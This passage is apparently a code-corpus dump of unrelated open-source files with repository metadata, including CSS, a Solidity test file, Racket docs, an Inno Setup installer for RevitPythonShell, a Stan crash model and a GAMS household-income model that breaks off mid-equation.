M.equals(T.nat(5)))]); tests }); let suite = Suite.suite("Result", [ chain, flatten, iterate, ]); Suite.run(suite);
Modelica
5
nomeata/motoko-base
test/resultTest.mo
[ "Apache-2.0" ]
@import 'css-dep';
CSS
0
laineus/vite
packages/playground/css/dep.css
[ "MIT" ]
.form-label { display:block; margin-top:16px; font-weight:bold; } .form-input { border-radius:5px; display:inline; } .form-input p { margin:0; } .form-button { margin:5px; } .form-error input.ng-invalid { border-color:red; } .check { display:inline; color:green; font-weight:bold; } .error-messages { color:red; } .error-messages p { margin:0; } #customers { font-family: "Trebuchet MS", Arial, Helvetica, sans-serif; border-collapse: collapse; width: 100%; } #users td, #users th { border: 1px solid dodgerblue; border-collapse:collapse; padding: 4px; width:200px; } #users tr:nth-child(even){background-color: lavender;} #users th { padding-top: 10px; padding-bottom: 10px; text-align: left; background-color: dodgerblue; } #users { border-collapse:collapse; } button { border-radius:5px; cursor:pointer; margin:10px; padding:5px; } .form-button-save { background-color:lightgreen; } .form-button-reset { background-color:lightpink; }
CSS
3
zeesh49/tutorials
spring-mvc-forms-jsp/src/main/webapp/css/user.css
[ "MIT" ]
// 14 lines 6 code 7 comments 1 blanks pragma solidity >=0.4.22 <0.6.0; // Comment line contract Foo { /* Comment line Comment line Comment line */ function foo(address bar) public { require(bar != 0); } }
Solidity
4
alexmaco/tokei
tests/data/solidity.sol
[ "Apache-2.0", "MIT" ]
#lang scribble/manual @require[scribble/example (for-label racket/base racket/contract)] @title{Source Syntax} @defmodule[syntax/source-syntax]{} @defproc[(recover-source-syntax [orig syntax?] [expanded syntax?] [#:traverse-now? now? boolean? #f]) (-> syntax? (or/c syntax? #f))]{ Returns a procedure that accepts a syntax object from @racket[expanded] and returns the outermost syntax object in @racket[orig] that has the same location as the given syntax object. If no syntax object in @racket[orig] has the same location as the given syntax object, the procedure repeats with the parent of the given syntax object. } @examples[#:eval (make-base-eval '(require syntax/source-syntax)) (let* ([orig #'(λ (x [y 0]) (+ x y))] [expanded (expand orig)] [recovered ((recover-source-syntax orig expanded) expanded)]) (syntax? recovered)) ]
Racket
5
wargrey/typed-racket
typed-racket-doc/source-syntax/scribblings/source-syntax.scrbl
[ "Apache-2.0", "MIT" ]
package com.baeldung.rules.jess; import jess.JessException; import jess.Rete; public class JessHello { public static final String RULES_FILE = "helloJess.clp"; public static void main(String[] args) throws JessException { Rete engine = new Rete(); engine.reset(); engine.batch(RULES_FILE); engine.run(); } }
Java
3
DBatOWL/tutorials
rule-engines/jess/src/main/java/com/baeldung/rules/jess/JessHello.java
[ "MIT" ]
[Files] Source: "{OUTDIR}PythonConsoleControl.dll"; DestDir: "{app}"; Flags: replacesameversion Source: "{OUTDIR}RevitPythonShell.dll"; DestDir: "{app}"; Flags: replacesameversion Source: "{OUTDIR}RpsRuntime.dll"; DestDir: "{app}"; Flags: replacesameversion Source: "{OUTDIR}RevitPythonShell.addin"; DestDir: "{userappdata}\Autodesk\Revit\Addins\{REVIT_VERSION}"; Flags: replacesameversion Source: "{OUTDIR}ICSharpCode.AvalonEdit.dll"; DestDir: "{app}" Source: "{OUTDIR}IronPython.dll"; DestDir: "{app}" Source: "{OUTDIR}IronPython.Modules.dll"; DestDir: "{app}" Source: "{OUTDIR}Microsoft.Scripting.Metadata.dll"; DestDir: "{app}" Source: "{OUTDIR}Microsoft.Dynamic.dll"; DestDir: "{app}" Source: "{OUTDIR}Microsoft.Scripting.dll"; DestDir: "{app}" Source: "{OUTDIR}DefaultConfig\RevitPythonShell.xml"; DestDir: "{userappdata}\RevitPythonShell\{REVIT_VERSION}"; Flags: onlyifdoesntexist Source: "{OUTDIR}DefaultConfig\init.py"; DestDir: {userappdata}\RevitPythonShell\{REVIT_VERSION}; Flags: confirmoverwrite; Source: "{OUTDIR}DefaultConfig\startup.py"; DestDir: {userappdata}\RevitPythonShell\{REVIT_VERSION}; Flags: confirmoverwrite; [code] { HANDLE INSTALL PROCESS STEPS } procedure CurStepChanged(CurStep: TSetupStep); var AddInFilePath: String; LoadedFile : TStrings; AddInFileContents: String; ReplaceString: String; SearchString: String; begin if CurStep = ssPostInstall then begin AddinFilePath := ExpandConstant('{userappdata}\Autodesk\Revit\Addins\{REVIT_VERSION}\RevitPythonShell.addin'); LoadedFile := TStringList.Create; SearchString := '{ASSEMBLY_PATH}'; ReplaceString := 'Assembly>' + ExpandConstant('{app}') + '\RevitPythonShell.dll<'; try LoadedFile.LoadFromFile(AddInFilePath); AddInFileContents := LoadedFile.Text; { Only save if text has been changed. } if StringChangeEx(AddInFileContents, SearchString, ReplaceString, True) > 0 then begin; LoadedFile.Text := AddInFileContents; LoadedFile.SaveToFile(AddInFilePath); end; finally LoadedFile.Free; end; end; end; [Setup] AppName=RevitPythonShell for Autodesk Revit {REVIT_VERSION} AppVerName=RevitPythonShell for Autodesk Revit {REVIT_VERSION} RestartIfNeededByRun=false DefaultDirName={pf32}\RevitPythonShell\{REVIT_VERSION} OutputBaseFilename=Setup_RevitPythonShell_{REVIT_VERSION} ShowLanguageDialog=auto FlatComponentsList=false UninstallFilesDir={app}\Uninstall UninstallDisplayName=RevitPythonShell for Autodesk Revit {REVIT_VERSION} AppVersion={REVIT_VERSION}.0 VersionInfoVersion={REVIT_VERSION}.0 VersionInfoDescription=RevitPythonShell for Autodesk Revit {REVIT_VERSION} VersionInfoTextVersion=RevitPythonShell for Autodesk Revit {REVIT_VERSION}
Inno Setup
3
PavelAltynnikov/revitpythonshell
RevitPythonShell/Manifests/SetupRPSTemplate.iss
[ "MIT" ]
data { int<lower=1> N_train;// number of training data points int<lower=1> N; // number of total data points int<lower=1> G; // number of groupings int<lower=3> J[G]; // group sizes int COND[N]; // index for surface condition/inclement weather int CITY[N]; // index for city int SLIM[N]; // index for posted speed limit int SIGN[N]; // index for signs and signals i.e. school zone/work zone int LGHT[N]; // index for light and time int BLTE[N]; // index for built environment int CITYxSLIM[N]; int LGHTxSLIM[N]; int BLTExSLIM[N]; int CONDxSLIM[N]; int LGHTxCOND[N]; int LGHTxCONDxSLIM[N]; vector[N] EXPR; // population exposed int count[N]; // number of pedestrian deaths } transformed data { vector[N] offset; offset = log(EXPR); } parameters { real offset_e; vector[J[1]] COND_eta; vector[J[2]] CITY_eta; vector[J[3]] SLIM_eta; vector[J[4]] SIGN_eta; vector[J[5]] LGHT_eta; vector[J[6]] BLTE_eta; vector[J[7]] CITYxSLIM_eta; vector[J[8]] LGHTxSLIM_eta; vector[J[9]] BLTExSLIM_eta; vector[J[10]] CONDxSLIM_eta; vector[J[11]] LGHTxCOND_eta; vector[J[12]] LGHTxCONDxSLIM_eta; vector<lower=0>[G + 1] sds; vector[N_train] cell_eta; real mu; } transformed parameters { vector[J[1]] COND_e; vector[J[2]] CITY_e; vector[J[3]] SLIM_e; vector[J[4]] SIGN_e; vector[J[5]] LGHT_e; vector[J[6]] BLTE_e; vector[J[7]] CITYxSLIM_e; vector[J[8]] LGHTxSLIM_e; vector[J[9]] BLTExSLIM_e; vector[J[10]] CONDxSLIM_e; vector[J[11]] LGHTxCOND_e; vector[J[12]] LGHTxCONDxSLIM_e; vector[N_train] cell_e; vector[N_train] mu_indiv; COND_e = sds[1] * COND_eta; CITY_e = sds[2] * CITY_eta; SLIM_e = sds[3] * SLIM_eta; SIGN_e = sds[4] * SIGN_eta; LGHT_e = sds[5] * LGHT_eta; BLTE_e = sds[6] * BLTE_eta; CITYxSLIM_e = sds[7] * CITYxSLIM_eta; LGHTxSLIM_e = sds[8] * LGHTxSLIM_eta; BLTExSLIM_e = sds[9] * BLTExSLIM_eta; CONDxSLIM_e = sds[10] * CONDxSLIM_eta; LGHTxCOND_e = sds[11] * LGHTxCOND_eta; LGHTxCONDxSLIM_e = sds[12] * LGHTxCONDxSLIM_eta; cell_e = sds[G+1] * cell_eta; for(n in 1:N_train) mu_indiv[n] = mu + offset_e * offset[n] + COND_e[COND[n]] + CITY_e[CITY[n]] + SLIM_e[SLIM[n]] + SIGN_e[SIGN[n]] + LGHT_e[LGHT[n]] + BLTE_e[BLTE[n]] + CITYxSLIM_e[CITYxSLIM[n]] + LGHTxSLIM_e[LGHTxSLIM[n]] + BLTExSLIM_e[BLTExSLIM[n]] + CONDxSLIM_e[CONDxSLIM[n]] + LGHTxCOND_e[LGHTxCOND[n]] + LGHTxCONDxSLIM_e[LGHTxCONDxSLIM[n]] + cell_e[n]; } model { COND_eta ~ normal(0,1); CITY_eta ~ normal(0,1); SLIM_eta ~ normal(0,1); SIGN_eta ~ normal(0,1); LGHT_eta ~ normal(0,1); BLTE_eta ~ normal(0,1); CITYxSLIM_eta ~ normal(0,1); LGHTxSLIM_eta ~ normal(0,1); BLTExSLIM_eta ~ normal(0,1); CONDxSLIM_eta ~ normal(0,1); LGHTxCOND_eta ~ normal(0,1); LGHTxCONDxSLIM_eta ~ normal(0,1); cell_eta ~ normal(0,1); offset_e ~ normal(0,1); sds ~ normal(0,1); mu ~ normal(0,10); for (n in 1:N_train){ target += poisson_log_lpmf(count[n] | mu_indiv[n]); target += -log1m_exp(-exp(mu_indiv[n])); } } generated quantities { real COND_sd; real CITY_sd; real SLIM_sd; real SIGN_sd; real LGHT_sd; real BLTE_sd; real CITYxSLIM_sd; real LGHTxSLIM_sd; real BLTExSLIM_sd; real CONDxSLIM_sd; real LGHTxCOND_sd; real LGHTxCONDxSLIM_sd; real cell_sd; vector[N - N_train] mu_indiv_pred; vector[N - N_train] cell_e_pred; COND_sd = sd(COND_e); CITY_sd = sd(CITY_e); SLIM_sd = sd(SLIM_e); SIGN_sd = sd(SIGN_e); LGHT_sd = sd(LGHT_e); BLTE_sd = sd(BLTE_e); CITYxSLIM_sd = sd(CITYxSLIM_e); LGHTxSLIM_sd = sd(LGHTxSLIM_e); BLTExSLIM_sd = sd(BLTExSLIM_e); CONDxSLIM_sd = sd(CONDxSLIM_e); LGHTxCOND_sd = sd(LGHTxCOND_e); LGHTxCONDxSLIM_sd = sd(LGHTxCONDxSLIM_e); cell_sd = sd(cell_e); for (n in 1:(N - N_train)){ cell_e_pred[n] = normal_rng(0, sds[G+1]); mu_indiv_pred[n] = mu + offset_e * offset[N_train + n] + COND_e[COND[N_train + n]] + CITY_e[CITY[N_train + n]] + SLIM_e[SLIM[N_train + n]] + SIGN_e[SIGN[N_train + n]] + LGHT_e[LGHT[N_train + n]] + BLTE_e[BLTE[N_train + n]] + CITYxSLIM_e[CITYxSLIM[N_train + n]] + LGHTxSLIM_e[LGHTxSLIM[N_train + n]] + BLTExSLIM_e[BLTExSLIM[N_train + n]] + CONDxSLIM_e[CONDxSLIM[N_train + n]] + LGHTxCOND_e[LGHTxCOND[N_train + n]] + LGHTxCONDxSLIM_e[LGHTxCONDxSLIM[N_train + n]] + cell_e_pred[n]; } }
Stan
3
simeond/stancon_talks
2017/Contributed-Talks/01_auerbach/model_int.stan
[ "CC-BY-4.0", "BSD-3-Clause" ]
# ====================================================================================================================== # Household income and portfolio accounting # - See consumers.gms for consumption decisions and budget constraint # ====================================================================================================================== # ====================================================================================================================== # Variable definition # - Define variables and group them based on endogeneity, inflation or growth adjustment, and how they should be forecast (if exogenous) # ====================================================================================================================== $IF %stage% == "variables": $GROUP G_HHincome_quantities empty_group_dummy[t]; $GROUP G_HHincome_prices pBoligRigid[a,t]$(t.val > 2015) "Rigid boligpris til brug i rRealKred2Bolig." ; $GROUP G_HHincome_values vtHh[a_,t]$(atot[a_]) "Skatter knyttet til husholdningerne i MAKRO." vDispInd[t]$(t.val > 1994) "Disponibel bruttoindkomst i husholdninger og organisationer, Kilde: ADAM[Yd_h]" vHhInd[a_,t]$((a0t100[a_] and t.val > 2015) or atot[a_]) "Husholdningernes indkomst." vHhxAfk[a_,t]$((aVal[a_] > 0 and t.val > 2015) or (atot[a_] and t.val > 1994)) "Imputeret afkast på husholdningernes formue ekskl. bolig og pension." vHhFinAkt[a_,t]$(t.val > 2015 or atot[a_]) "Finansielle aktiver ejer af husholdningerne ekskl. pension." vHh[portf_,a_,t]$(0) "Husholdningernes finansielle portefølje, Kilde: jf. se for portefølje." vHh$(sameas[portf_, "NetFin"] and t.val > 2015) "" vHh$(sameas[portf_, "RealKred"] and (a18t100[a_] or aTot[a_]) and t.val > 2015) "" vHh$(pens[portf_] and (a15t100[a_] or aTot[a_]) and t.val > 2015) "" vHh$(sameas[portf_, "pens"] and (a15t100[a_] or aTot[a_]) and t.val > 2015) "" vHh$(sameas[portf_, "BankGaeld"] and t.val > 2015 or (sameas[portf_,'BankGaeld'] and atot[a_]) ) "" vHh$(fin_akt[portf_] and t.val > 2015) "" vHhRenter[portf_,t]$(t.val > 2015) "Husholdningernes formueindkomst, Kilde: ADAM[Tin_h]" vHhOmv[portf_,t]$(t.val > 2015) "Omvurderinger på husholdningernes finansielle nettoformue, Kilde: ADAM[Wn_h]-ADAM[Wn_h][-1]-ADAM[Tfn_h]" vHhPensAfk[portf_,a_,t]$((pens[portf_] or sameas['Pens',portf_]) and (aVal[a_] >= 15 or atot[a_]) and t.val > 2015) "Afkast fra pensionsformue EFTER SKAT." vHhNFE[t] "Nettofordringserhvervelse for husholdningerne, Kilde: ADAM[Tfn_h]" vPensIndb[portf_,a_,t]$(pens_[portf_] and (a15t100[a_] or atot[a_]) and t.val > 2015) "Pensionsindbetalinger." vPensUdb[portf_,a_,t]$(pens_[portf_] and (a15t100[a_] or atot[a_]) and t.val > 2015) "Pensionsudbetalinger." vPensArv[portf_,a_,t]$(pens_[portf_] and (aVal[a_] >= 15 or aTot[a_]) and t.val > 2015) "Pension udbetalt til arvinger i tilfælde af død." vNetIndPensUdb[t] "Nettopensionsudbetalinger til individuelle pensionsordninger." vNetKolPensUdb[t] "Nettopensionsudbetalinger til kollektive pensionsordninger." vKolPensRenter[t] "Afkast ekskl. omvurderinger fra kollektive pensionsordninger." vLejeAfEjerBolig[t] "Imputeret værdi af lejeværdi af egen bolig, Kilde: ADAM[byrhh] * ADAM[Yrh]" vHhFraVirkKap[t] "Nettokapitaloverførsler fra virksomhederne til husholdningerne, Kilde: ADAM[Tknr_h]" vHhFraVirkOev[t] "Øvrige nettooverførsler fra virksomhederne til husholdningerne, Kilde: ADAM[Trn_h] - ADAM[Tr_o_h] + ADAM[Trks] + ADAM[Trr_hc_o]" vHhFraVirk[t] "Andre nettooverførsler fra virksomhederne til husholdningerne, Kilde: ADAM[Tknr_h] + ADAM[Trn_h] - ADAM[Tr_o_h] + ADAM[Trks] + ADAM[Trr_hc_o]" vHhTilUdl[t] "Skat til udlandet og nettopensionsbetalinger til udlandet, Kilde: ADAM[Syn_e] + (ADAM[Typc_cf_e] - ADAM[Tpc_e_z]) - ADAM[Typc_e_h] - ADAM[Tpc_h_e]" ; $GROUP G_HHincome_endo G_HHincome_quantities G_HHincome_prices G_HHincome_values mrHhxAfk[t]$(t.val > 2015) "Marginalt afkast efter skat på vHhx (husholdningernes formue ekskl. pension, bolig og realkreditgæld)." mrRealKredAfk[t]$(t.val > 2015) "Husholdningernes effektive marginalrente efter skat på realkredit." rRealKred2Bolig[a_,t]$((atot[a_] or a18t100[a_]) and t.val > 2015) "Husholdningernes realkreditgæld relativt til deres boligformue." rPensIndb[pens,a_,t]$(atot[a_] and t.val > 2015) "Pensionsindbetalingsrate." rPensUdb[pens,a_,t]$(atot[a_] and not (sameas['Alder',pens] and t.val < 2014) and t.val > 2015) "Pensionsudbetalingsrate" # Alderspensionen eksisterer først fra 2013 og frem rBoligOmkRest[t] "Øvrige ejerboligomkostninger ift. boligens værdi." rHhAfk[portf,t] "Husholdningens samlede afkast for aktive/passiv typen." jvHhxAfk[a_,t]$(aTot[a_] and t.val > 2015) "J-led." jvHhPensAfk[portf_,a_,t]$(((pens[portf_] and atot[a_]) or sameas['Pens',portf_]) and t.val > 2015) "j-led." jvHh[t]$(t.val > 2015) "Fejl-led som bør være nul fra inkonsistens mellem top-down og buttom-up formue." mtAktie[t]$(t.val > 2015) "Marginal skat på aktieafkast." ; $GROUP G_HHincome_endo G_HHincome_endo$(tx0[t]); # Restrict endo group to tx0[t] $GROUP G_HHincome_exogenous_forecast ErAktieAfk_static[t] "Husholdningernes forventede aktieafkast i historisk periode." rPensIndb[pens,a_,t]$(a[a_]) "Pensionsindbetalingsrate." rPensUdb[pens,a_,t]$(a[a_]) "Pensionsudbetalingsrate." rPensArv[pens,a_,t] "Andel af pensionsformue, som udbetales i tilfælde af død." # Forecast as zero: jvHhxAfk[a_,t]$(a[a_]) "J-led." jvHhOmv[t] "J-led." jvHhRenter[t] "J-led." jvhhpensafk[portf_,a_,t] "J-led." jvNetKolPensUdb[t] "J-led." jvKolPensRenter[t] "J-led." jmrHhAfk[t] "J-led." jrHhRente[portf,t] "J-led som dækker forskel mellem husholdningens rente og den gennemsnitlige rente på aktivet/passivet." jrHhOmv[portf,t] "J-led som dækker forskel mellem husholdningens rente og den gennemsnitlige omvurdering på aktivet/passivet." ; $GROUP G_HHincome_other # Portfolio rtTopRenter[t] "Andel af renteindtægter, der betales topskat af." mrNet2KapIndPos[t] "Marginal stigning i positiv nettokapitalindkomst ved stigning i kapitalindkomst" rKolPens[pens,t] "Andel af pensionsformue i kollektive ordninger." rHhFraVirkKap[t] "Nettokapitaloverførsler fra virksomhederne til husholdningerne ift. BNP." rHhFraVirkOev[t] "Andre nettooverførsler fra virksomhederne til husholdningerne ift. BNP." rHhTilUdl[t] "Andre nettooverførsler fra virksomhederne til udlandet ift. BNP." cHh_a[akt,a,t] "Aldersafhængigt additivt led i husholdningens aktiv-beholdninger, vHh[akt]." cHh_t[akt,t] "Tidsvariant additivt led i husholdningens aktiv-beholdninger, vHh[akt]." dvHh2dvHhx[portf_,t] "Ændring i husholdningens aktiv-beholdninger, vHh[akt], for en ændring i formuen vHhx (eksklusiv pension og bolig)." dvHh2dvBolig[portf_,t] "Ændring i husholdningens aktiv-beholdninger, vHh[akt], for en ændring i bolig-formuen vBolig." dvHh2dvPensIndb[portf_,t] "Ændring i husholdningens aktiv-beholdninger, vHh[akt], for en ændring i pensions-formuen vHh['Pens']." rBoligOmkRestRes[t] "Øvrige ejerboligomkostninger ift. boligens værdi - residual efter materialer, løn og ejendomsskat." rRealKredTraeg "Træghed i pBoligRigid." rRealKred2Bolig_a[a,t] "Aldersspecifikt led i husholdningernes langsigtede realkreditgæld relativt til deres boligformue." rRealKred2Bolig_t[t] "Tidsvariant led i husholdningernes langsigtede realkreditgæld relativt til deres boligformue." cmtAktie[t] "Forskel mellem gennemsnitlig og marginal skat på aktieafkast." ; $ENDIF # ====================================================================================================================== # Equations # ====================================================================================================================== $IF %stage% == "equations": $BLOCK B_HHincome # Disposable income (gælder fra 1994 - manglende data fra før dette år) E_vDispInd[t]$(tx0[t] and t.val > 1994).. vDispInd[t] =E= vWHh[aTot,t] + vSelvstKapInd[aTot,t] + vOvf['hh',t] - vtHh[aTot,t] + vtArv[aTot,t] + vHhRenter['NetFin',t] - vKolPensRenter[t] + vNetKolPensUdb[t] + vLejeAfEjerBolig[t] + vOffTilHhOev[t] - vOffFraHh[t] + vHhFraVirkOev[t] - vHhTilUdl[t]; E_vLejeAfEjerBolig[t]$(tx0[t]).. vLejeAfEjerBolig[t] =E= pC['cBol',t] * qC['cBol',t] - vCLejeBolig[aTot,t] - rBoligOmkRest[t] * vBolig[aTot,t-1]/fv; # Nettopensionsudbetalinger opdeles i kollektive og individuelle ordninger for at beregne disponibel indkomst E_vNetKolPensUdb[t]$(tx0[t]).. vNetKolPensUdb[t] =E= sum(pens, rKolPens[pens,t] * (vPensUdb[pens,aTot,t] - vPensIndb[pens,aTot,t])) + jvNetKolPensUdb[t]; E_vNetIndPensUdb[t]$(tx0[t]).. vNetIndPensUdb[t] =E= vPensUdb['Pens',aTot,t] - vPensIndb['Pens',aTot,t] - vNetKolPensUdb[t]; E_vKolPensRenter[t]$(tx0[t]).. vKolPensRenter[t] =E= sum(pens, rKolPens[pens,t] * vHh[pens,aTot,t-1]/fv) * (1 - tPAL[t] * ftPAL[t]) * rRente['Pens',t] + jvKolPensRenter[t]; # Household income net of taxes and capital income E_vHhInd_aTot[t]$(tx0[t]).. vHhInd[aTot,t] =E= vWHh[aTot,t] + vOvf['hh',t] + (vPensUdb['Pens',aTot,t] - vPensArv['Pens',aTot,t]) - vPensIndb['Pens',aTot,t] - vtHhx[aTot,t] + vArv[aTot,t] + vArvKorrektion[aTot,t] + vHhNFErest[aTot,t]; E_vHhInd[a,t]$(tx0[t] and a0t100[a] and t.val > 2015).. vHhInd[a,t] =E= vWHh[a,t] * nLHh[a,t] / nPop[a,t] + vHhOvf[a,t] + vPensUdb['Pens',a,t] - vPensIndb['Pens',a,t] - vtHhx[a,t] + vArv[a,t] + vArvKorrektion[a,t] + vHhNFErest[a,t]; E_vtHh_aTot[t]$(tx0[t]).. vtHh[aTot,t] =E= vtKilde[t] + vtHhAM[aTot,t] + vtPersRest[aTot,t] + vtHhVaegt[aTot,t] + vtPAL[t] + vtMedie[t] + vtArv[aTot,t] + vBidrag[aTot,t] + vtKirke[aTot,t] + vtDirekteRest[t] + vtLukning[aTot,t]; E_rBoligOmkRest[t]$(tx0[t]).. rBoligOmkRest[t] =E= (vR['bol',t] + vLoensum['bol',t] + vSelvstLoen['bol',t] + vtGrund['bol',t]) * qKBolig[t-1] / qK['iB','bol',t-1] / (vBolig[aTot,t-1]/fv) + rBoligOmkRestRes[t]; # Other transfers E_vHhFraVirkKap[t]$(tx0[t]).. vHhFraVirkKap[t] =E= rHhFraVirkKap[t] * vBNP[t]; E_vHhFraVirkOev[t]$(tx0[t]).. vHhFraVirkOev[t] =E= rHhFraVirkOev[t] * vBNP[t]; E_vHhFraVirk[t]$(tx0[t]).. vHhFraVirk[t] =E= vHhFraVirkKap[t] + vHhFraVirkOev[t]; E_vHhTilUdl[t]$(tx0[t]).. vHhTilUdl[t] =E= rHhTilUdl[t] * vBNP[t]; # ------------------------------------------------------------------------------------------------------------------ # Portfolio and capital income # ------------------------------------------------------------------------------------------------------------------ # Marginalt afkast efter skat på vHhx (husholdningernes formue ekskl. pension, bolig og realkreditgæld) E_mrHhAfk[t]$(tx0[t] and t.val > 2015).. mrHhxAfk[t] =E= ( dvHh2dvHhx['IndlAktier',t-1] * rHhAfk['IndlAktier',t] + dvHh2dvHhx['UdlAktier',t-1] * rHhAfk['UdlAktier',t] ) * (1-tAktie[t]) + ( dvHh2dvHhx['Obl',t-1] * rHhAfk['obl',t] + dvHh2dvHhx['Bank',t-1] * rHhAfk['Bank',t] - dvHh2dvHhx['BankGaeld',t-1] * rHhAfk['BankGaeld',t] ) * (1 - tKommune[t] - mrNet2KapIndPos[t] * (tBund[t] + tTop[t] * rtTopRenter[t])) + jmrHhAfk[t]; E_mrRealKredAfk[t]$(tx0[t] and t.val > 2015).. mrRealKredAfk[t] =E= rHhAfk['RealKred',t] * (1 - tKommune[t] - mrNet2KapIndPos[t] * (tBund[t] + tTop[t] * rtTopRenter[t])); E_mtAktie[t]$(tx0[t] and t.val > 2015).. mtAktie[t] =E= tAktie[t] + cmtAktie[t]; E_rHhAfk[portf,t]$(tx0[t] and t.val > 1994).. rHhAfk[portf,t] =E= rRente[portf,t] + jrHhRente[portf,t] + rOmv[portf,t] + jrHhOmv[portf,t]; # Net capital income E_vHhxAfk[a,t]$(a.val > 0 and tx0[t] and t.val > 2015).. vHhxAfk[a,t] =E= sum(akt$(not sameas[akt,'Pens']), rHhAfk[akt,t] * vHh[akt,a-1,t-1]/fv) - rHhAfk['BankGaeld',t] * vHh['BankGaeld',a-1,t-1]/fv + jvHhxAfk[a,t]; E_vHhxAfk_aTot[t]$(tx0[t] and t.val > 1994).. vHhxAfk[aTot,t] =E= sum(akt$(not sameas[akt,'Pens']), rHhAfk[akt,t] * vHh[akt,aTot,t-1]/fv) - rHhAfk['BankGaeld',t] * vHh['BankGaeld',aTot,t-1]/fv + jvHhxAfk[aTot,t]; E_jvHhxAfk_aTot[t]$(tx0[t] and t.val > 2015).. jvHhxAfk[aTot,t] =E= sum(a$(a.val > 0), jvHhxAfk[a,t] * nPop[a-1,t-1]); E_vHhRenter_akt[akt,t]$(tx0[t] and t.val > 1994).. vHhRenter[akt,t] =E= (rRente[akt,t] + jrHhRente[akt,t]) * vHh[akt,atot,t-1]/fv; E_vHhRenter_pas[pas,t]$(tx0[t] and t.val > 1994).. vHhRenter[pas,t] =E= (rRente[pas,t] + jrHhRente[pas,t]) * vHh[pas,atot,t-1]/fv; E_vHhRenter_NetFin[t]$(tx0[t] and t.val > 1994).. vHhRenter['NetFin',t] =E= sum(akt, vHhRenter[akt,t]) - sum(pas, vHhRenter[pas,t]) + jvHhRenter[t]; E_vHhOmv_akt[akt,t]$(tx0[t] and t.val > 1994).. vHhOmv[akt,t] =E= (rOmv[akt,t] + jrHhOmv[akt,t]) * vHh[akt,atot,t-1]/fv; E_vHhOmv_pas[pas,t]$(tx0[t] and t.val > 1994).. vHhOmv[pas,t] =E= (rOmv[pas,t] + jrHhOmv[pas,t]) * vHh[pas,atot,t-1]/fv; E_vHhOmv_NetFin[t]$(tx0[t] and t.val > 1994).. vHhOmv['NetFin',t] =E= sum(akt, vHhOmv[akt,t]) - sum(pas, vHhOmv[pas,t]) + jvHhOmv[t]; E_vHh_NetFin[a,t]$(tx0[t] and t.val > 2015).. vHh['NetFin',a,t] =E= vHhx[a,t] + vHh['Pens',a,t] - vHh['RealKred',a,t]; E_vHh_NetFin_aTot[t]$(tx0[t] and t.val > 2015).. vHh['NetFin',aTot,t] =E= vHh['NetFin',aTot,t-1]/fv + vHhRenter['NetFin',t] + vHhOmv['NetFin',t] + vWHh[aTot,t] + vOvf['hh',t] + vHhNFErest[aTot,t] - vtHh[aTot,t] - (vC[cTot,t] - vLejeAfEjerBolig[t]) # = -(pC['cIkkeBol',t] * qC_a[aTot,t] + vCLejeBolig[aTot,t] + rBoligOmkRest[t] * vBolig[aTot,t-1]/fv) - vIBolig[t] # Boliginvesteringer + jvHh[t]; # Fejl-led E_jvHh[t]$(tx0[t] and t.val > 2015).. vHh['NetFin',aTot,t] =E= sum(a, vHh['NetFin',a,t] * nPop[a,t]); E_pBoligRigid_a18[a,t]$(a.val = 18 and tx0[t] and t.val > 2015).. pBoligRigid[a,t] =E= (1-rRealKredTraeg) * pBolig[t] + rRealKredTraeg * pBoligRigid[a,t-1]/fp; E_pBoligRigid[a,t]$(18 < a.val and a.val <= 100 and tx0[t] and t.val > 2015).. pBoligRigid[a,t] =E= (1 - qBolig[a-1,t-1]/fq / qBolig[a,t]) * pBolig[t] + qBolig[a-1,t-1]/fq / qBolig[a,t] * ((1-rRealKredTraeg) * pBolig[t] + rRealKredTraeg * pBoligRigid[a-1,t-1]/fp); E_vHh_RealKred[a,t]$(a18t100[a] and tx0[t] and t.val > 2015).. vHh['RealKred',a,t] =E= rRealKred2Bolig[a,t] * vBolig[a,t]; E_vHh_RealKred_aTot[t]$(tx0[t] and t.val > 2015).. vHh['RealKred',aTot,t] =E= rRealKred2Bolig[aTot,t] * vBolig[aTot,t]; E_rRealKred2Bolig[a,t]$(a18t100[a] and tx0[t] and t.val > 2015).. rRealKred2Bolig[a,t] =E= (rRealKred2Bolig_a[a,t] + rRealKred2Bolig_t[t]) * pBoligRigid[a,t] / pBolig[t]; E_rRealKred2Bolig_aTot[t]$(tx0[t] and t.val > 2015).. rRealKred2Bolig[aTot,t] =E= sum(a, vHh['RealKred',a,t] * nPop[a,t]) / vBolig[aTot,t]; # Pensionsbeholdning samt afkast og ind- og udbetalinger E_vHhPensAfk[pens,a,t]$(a.val >= 15 and tx0[t] and t.val > 2015).. vHhPensAfk[pens,a,t] =E= (1 - tPAL[t] * ftPAL[t]) * rHhAfk['Pens',t] * vHh[pens,a-1,t-1]/fv + jvHhPensAfk[pens,a,t]; E_vHhPensAfk_aTot[pens,t]$(tx0[t] and t.val > 2015).. vHhPensAfk[pens,aTot,t] =E= (1 - tPAL[t] * ftPAL[t]) * rHhAfk['Pens',t] * vHh[pens,aTot,t-1]/fv + jvHhPensAfk[pens,aTot,t]; E_jvHhPensAfk_aTot[pens,t]$(tx0[t] and t.val > 2015).. jvHhPensAfk[pens,aTot,t] =E= sum(a, jvHhPensAfk[pens,a,t] * nPop[a-1,t-1]); E_jvHhPensAfk_pens[a,t]$(tx0[t] and t.val > 2015).. jvHhPensAfk['Pens',a,t] =E= sum(pens, jvHhPensAfk[pens,a,t]); E_jvHhPensAfk_pens_atot[t]$(tx0[t] and t.val > 2015).. jvHhPensAfk['Pens',aTot,t] =E= sum(pens, jvHhPensAfk[pens,aTot,t]); E_vHh_pens[pens,a,t]$(a15t100[a] and tx0[t] and t.val > 2015).. vHh[pens,a,t] =E= (vHh[pens,a-1,t-1]/fv + vHhPensAfk[pens,a,t] - vPensArv[pens,a,t] * (1-rOverlev[a-1,t-1])) * nPop[a-1,t-1] / nPop[a,t] + vPensIndb[pens,a,t] - vPensUdb[pens,a,t]; # Formue og afkast ganges med nPop[a-1,t-1]/nPop[a,t], da der udbetales bonus alt efter, hvor mange der overlever E_vHh_pens_aTot[pens,t]$(tx0[t] and t.val > 2015).. vHh[pens,aTot,t] =E= vHh[pens,aTot,t-1]/fv + vHhPensAfk[pens,aTot,t] + vPensIndb[pens,aTot,t] - vPensUdb[pens,aTot,t]; # Pensionsindbetalinger E_vPensIndb[pens,a,t]$(a15t100[a] and tx0[t] and t.val > 2015).. vPensIndb[pens,a,t] =E= rPensIndb[pens,a,t] * vWHh[a,t] * nLHh[a,t] / nPop[a,t]; E_vPensIndb_aTot[pens,t]$(tx0[t] and t.val > 2015).. vPensIndb[pens,aTot,t] =E= rPensIndb[pens,aTot,t] * vWHh[aTot,t]; E_rPensIndb_aTot[pens,t]$(tx0[t] and 